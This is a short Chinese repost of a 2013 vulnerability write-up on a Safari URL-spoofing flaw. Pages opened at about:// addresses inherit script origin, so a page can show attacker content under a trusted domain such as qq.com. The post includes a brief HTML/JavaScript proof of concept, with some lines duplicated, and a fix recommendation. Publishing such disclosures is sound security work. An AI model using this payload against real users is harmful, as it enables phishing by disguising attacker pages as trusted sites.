记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Safari浏览器设计不当存在URL欺骗

2013-02-16 18:40
由于某些URL协议实现的不严谨导致URL欺骗漏洞

在safari下about://xxxxxxx 会被视为一个有效资源页,而且和about:blank有同样功效,可以继承effective script origin,所以我们可以通过打开一个about://www.qq.com这样的地址来做URL欺骗. 

POC:
 
<script>
<script>
function poc(){
var w=open('about://view.news.qq.com/zt2012/modern_times/index.htm');
w.document.body.innerHTML='I'm sogili hehehe';
}
</script>
<button onclick=poc();>clickme</button>
<button onclick=poc();>clickme</button>
 
修复方案:
严格限定about协议的源继承. 
 
知识来源: www.2cto.com/Article/201302/189056.html

阅读:66186 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“Safari浏览器设计不当存在URL欺骗”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云